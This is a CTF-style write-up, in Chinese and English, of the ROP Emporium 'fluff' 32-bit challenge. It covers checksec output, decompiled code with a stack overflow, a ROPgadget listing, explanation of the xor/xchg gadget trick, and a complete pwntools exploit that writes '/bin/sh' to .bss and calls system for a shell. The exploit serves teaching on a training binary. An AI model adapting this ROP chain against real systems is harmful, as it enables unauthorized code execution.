ROP fluff


  1. checksec fluff32

        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
  2. IDA

    int __cdecl main(int argc, const char **argv, const char **envp)
      setvbuf(stdout, 0, 2, 0);
      setvbuf(stderr, 0, 2, 0);
      puts("fluff by ROP Emporium");
      return 0;


    char *pwnme()
      char s; // [sp+0h] [bp-28h]@1
      memset(&s, 0, 0x20u);
      puts("You know changing these strings means I have to rewrite my solutions...");
      printf("> ");
      return fgets(&s, 512, stdin);

    You know changing these strings means I have to rewrite my solutions…


    int usefulFunction()
      return system("/bin/ls");



    Working backwards

    Once we’ve employed our usual drills of checking protections and searching for interesting symbols and strings we can think about what we’re trying to acheive and plan our chain. A solid approach is to work backwards; we’ll need a mov [reg], reg or something equivalent to make the actual write so we can start there.

    Do it!

    There’s not much more to this challenge, we just have to think about ways to move data into the registers we want to control. Sometimes we’ll need to take an indirect approach, especially in smaller binaries with fewer available gadgets like this one. Once you’ve got a working write primitive go ahead and craft your solution. If you don’t feel like doing the hard work note that the 64 bit version of this challenge can also be pwned using the same single link chain that works on write4 🤦‍♂️


  3. 需要先知道一些基础知识:




    ROPgadget --binary fluff32 --only "mov|pop|ret|xor|xchg"
    0x08048547 : mov al, byte ptr [0xc9010804] ; ret
    0x08048709 : mov dword ptr [0x81fffffd], eax ; ret
    0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
    0x08048674 : mov ebp, 0xcafebabe ; ret
    0x080484b0 : mov ebx, dword ptr [esp] ; ret
    0x0804867e : mov edi, 0xdeadbabe ; ret
    0x0804868c : mov edx, 0xdefaced0 ; ret
    0x0804867d : pop ebp ; mov edi, 0xdeadbabe ; ret
    0x0804868b : pop ebp ; mov edx, 0xdefaced0 ; ret
    0x08048695 : pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
    0x080486fb : pop ebp ; ret
    0x080486f8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
    0x080483e1 : pop ebx ; ret
    0x08048696 : pop ebx ; xor byte ptr [ecx], bl ; ret
    0x08048692 : pop edi ; mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret
    0x080486fa : pop edi ; pop ebp ; ret
    0x08048670 : pop edi ; xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
    0x08048673 : pop esi ; mov ebp, 0xcafebabe ; ret
    0x080486f9 : pop esi ; pop edi ; pop ebp ; ret
    0x0804867a : pop esi ; xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
    0x080483ca : ret
    0x080484fe : ret 0xeac1
    0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret
    0x08048697 : xor byte ptr [ecx], bl ; ret
    0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
    0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
    Unique gadgets found: 26


    0x08048693 : mov dword ptr [ecx], edx ; pop ebp ; pop ebx ; xor byte ptr [ecx], bl ; ret


    0x080483e1 : pop ebx ; ret


    0x08048689 : xchg edx, ecx ; pop ebp ; mov edx, 0xdefaced0 ; ret

    xchg 交换两个操作数的数据,将第二个参数x放入寄存器中与第一个指针参数所指的内容交换,也就是说第一个参数所指的内容是第二个参数,第二个参数所指的内容是第一个参数


    0x0804867b : xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret



    0x08048671 : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret


  4. 想要把内容放入寄存器,需要清空原寄存器的东西,然后分两次放入(32位嘛)。

    把内容写入寄存器,需要清空原寄存器,拿到手里的工具也就一个ecx可用(仔细看),但是无pop ecx(也无pop edx),但是有xchg edx,ecx,可以二者直接交换,那么就好整了,搞定ebx然后xchg edx,ecx交换把ebx数据直接换进ecx,就达成了目的(目的是把edx写入ecx)。

  5. EXP


    from pwn import *
    #context.log_level = 'debug'
    elf = ELF('./fluff32')
    p = process('./fluff32')
    pop_ebx = 0x080483e1
    xor_edx_edx = 0x08048671
    xor_edx_ebx = 0x0804867b
    mov_edx_to_ecx = 0x08048693
    xchg_edx_ecx = 0x08048689
    system_plt = elf.plt['system']
    bss = elf.bss()
    payload = ('A'*0x28)+p32(0)
    payload += p32(pop_ebx)
    payload += p32(bss)
    payload += p32(xor_edx_edx)+p32(0)
    payload += p32(xor_edx_ebx)+p32(0)
    payload += p32(xchg_edx_ecx)+p32(0)
    payload += p32(pop_ebx)
    payload += "/bin"
    payload += p32(xor_edx_edx)+p32(0)
    payload += p32(xor_edx_ebx)+p32(0)
    payload += p32(mov_edx_to_ecx)+p32(0)+p32(0)
    payload += p32(pop_ebx)
    payload += p32(bss+4)
    payload += p32(xor_edx_edx)+p32(0)
    payload += p32(xor_edx_ebx)+p32(0)
    payload += p32(xchg_edx_ecx)+p32(0)
    payload += p32(pop_ebx)
    payload += "/sh\x00"
    payload += p32(xor_edx_edx)+p32(0)
    payload += p32(xor_edx_ebx)+p32(0)
    payload += p32(mov_edx_to_ecx)+p32(0)+p32(0)
    payload += p32(system_plt)
    payload += p32(0xdeadbeef)
    payload += p32(bss)
    $ cat flag.txt
